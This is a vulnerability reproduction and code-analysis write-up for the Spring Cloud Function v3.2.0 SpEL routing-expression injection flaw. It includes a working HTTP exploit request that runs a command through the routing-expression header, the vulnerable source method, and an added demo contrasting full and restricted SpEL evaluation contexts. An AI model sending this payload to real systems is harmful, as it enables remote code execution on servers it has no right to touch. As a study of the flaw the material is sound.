Spring Cloud Function Vulnerability Reproduction
1. Environment Setup
https://codeload.github.com/spring-cloud/spring-cloud-function/zip/refs/tags/v3.2.0
Download this archive and open it directly in IDEA. The sample module to use is:
spring-cloud-function-samples/function-sample-pojo
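Running this module starts the test environment.
Then access the application.
2. RCE by Modifying the Configuration File
Then request any route.
3. RCE Under the Default Configuration File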
POST /functionRouter HTTP/1.1
Host: 192.168.66.101:8080
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("calc")
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

test
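4. Code Analysis
Start from the test class RoutingFunctionTests.java.
It appears to call the apply function, passing an input of type Message.
So set a breakpoint there.
The code block that is actually triggered is: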
function = this.functionFromExpression((String)message.getHeaders().get("spring.cloud.function.routing-expression"), message);
Stepping further into it:
private FunctionInvocationWrapper functionFromExpression(String routingExpression, Object input) {
    Expression expression = this.spelParser.parseExpression(routingExpression);
    String functionName = (String)expression.getValue(this.evalContext, input, String.class);
    Assert.hasText(functionName, "Failed to resolve function name based on routing expression '" + this.functionProperties.getRoutingExpression() + "'");
    FunctionInvocationWrapper function = (FunctionInvocationWrapper)this.functionCatalog.lookup(functionName);
    Assert.notNull(function, "Failed to lookup function to route to based on the expression '" + this.functionProperties.getRoutingExpression() + "' whcih resolved to '" + functionName + "' function name.");
    if (logger.isInfoEnabled()) {
        logger.info("Resolved function from provided [routing-expression] " + routingExpression);
    }
    return function;
}
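The method above evaluates the header value before it ever consults functionCatalog, so the lookup cannot act as a filter. The following added example (not code from the original post or from the Spring project) contrasts a StandardEvaluationContext with a restricted SimpleEvaluationContext using a harmless type reference. It assumes spring-expression is on the classpath; RoutingExpressionDemo, CATALOG, resolve and attempt are hypothetical names, and the input map is constructed sample data.

```java
import java.util.Map;
import java.util.Set;
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.spel.SpelEvaluationException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class RoutingExpressionDemo {
    private static final SpelExpressionParser PARSER = new SpelExpressionParser();
    // Hypothetical stand-in for functionCatalog: the only names that may be routed to.
    private static final Set<String> CATALOG = Set.of("uppercase", "lowercase");

    // Same order of operations as functionFromExpression: evaluate first, look up second.
    static String resolve(String routingExpression, Object input, EvaluationContext ctx) {
        String name = PARSER.parseExpression(routingExpression).getValue(ctx, input, String.class);
        if (name == null || !CATALOG.contains(name)) {
            throw new IllegalArgumentException("no function named '" + name + "'");
        }
        return name;
    }

    // Reports whether an expression was routed, evaluated but not found, or refused outright.
    static String attempt(String label, String expr, Object input, EvaluationContext ctx) {
        try {
            return label + ": routed to " + resolve(expr, input, ctx);
        } catch (SpelEvaluationException e) {
            return label + ": rejected during evaluation (" + e.getMessageCode() + ")";
        } catch (IllegalArgumentException e) {
            return label + ": evaluated, then failed lookup (" + e.getMessage() + ")";
        }
    }

    public static void main(String[] args) {
        Map<String, Object> input = Map.of("type", "uppercase"); // constructed sample input
        EvaluationContext full = new StandardEvaluationContext();
        EvaluationContext restricted = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        String benign = "['type']";
        // Harmless type reference: it only reads a system property.
        String typeRef = "T(java.lang.System).getProperty('java.version')";

        System.out.println(attempt("full/benign", benign, input, full));
        System.out.println(attempt("full/typeRef", typeRef, input, full));
        System.out.println(attempt("restricted/benign", benign, input, restricted));
        System.out.println(attempt("restricted/typeRef", typeRef, input, restricted));
    }
}
```

With the full context the type reference runs and only the later catalog lookup fails; with the restricted context the same expression is refused during evaluation, while the benign routing expression still resolves in both.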
References:
https://mp.weixin.qq.com/s/ssHcLC72wZqzt-ei_ZoLwg
https://wx.zsxq.com/dweb2/index/topic_detail/184254458222452